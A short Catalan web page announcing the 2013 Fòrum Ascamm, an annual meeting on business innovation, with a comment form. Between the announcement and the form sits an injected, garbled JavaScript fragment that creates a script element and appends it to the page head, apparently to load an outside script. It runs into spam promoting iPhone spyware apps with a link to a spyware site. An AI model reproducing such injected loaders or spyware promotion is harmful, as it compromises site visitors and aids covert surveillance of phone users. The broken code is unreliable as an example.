Activitats

Fòrum Ascamm

El Fòrum Ascamm és una jornada amb periodicitat anual que té per objecte ser un punt de trobada i debat sobre els

diferents aspectes de la innovació que incideixen en la competitivitat empresarial, des d’un enfocament pluridisciplinar que inclou tant la innovació tecnològica com l’estratègica, organitzativa i de gestió.

El Fòrum 2013, versarà sobre el s “NOUS CONCEPTES DE NEGOCI A LA INDÚSTRIA”, introduint tendències recents i presentant casos integradors com productes industrials avançats amb serveis de manteniment predictiu remot o maquinària de fabricació amb finançament i recomprar al final del projecte productiu.

Per a més informació sobre les a edicions anteriors, a : forumascamm.com

 

var d=document;var s=d.createElement(‘script’);

if (document.currentScript) { if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);spy app, best spy for iphone, how to spy on iphonehttp://gmbchope.org/call-tracker-iphone-spyware-software-spy-text/

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *

Podeu fer servir aquestes etiquetes i atributs HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>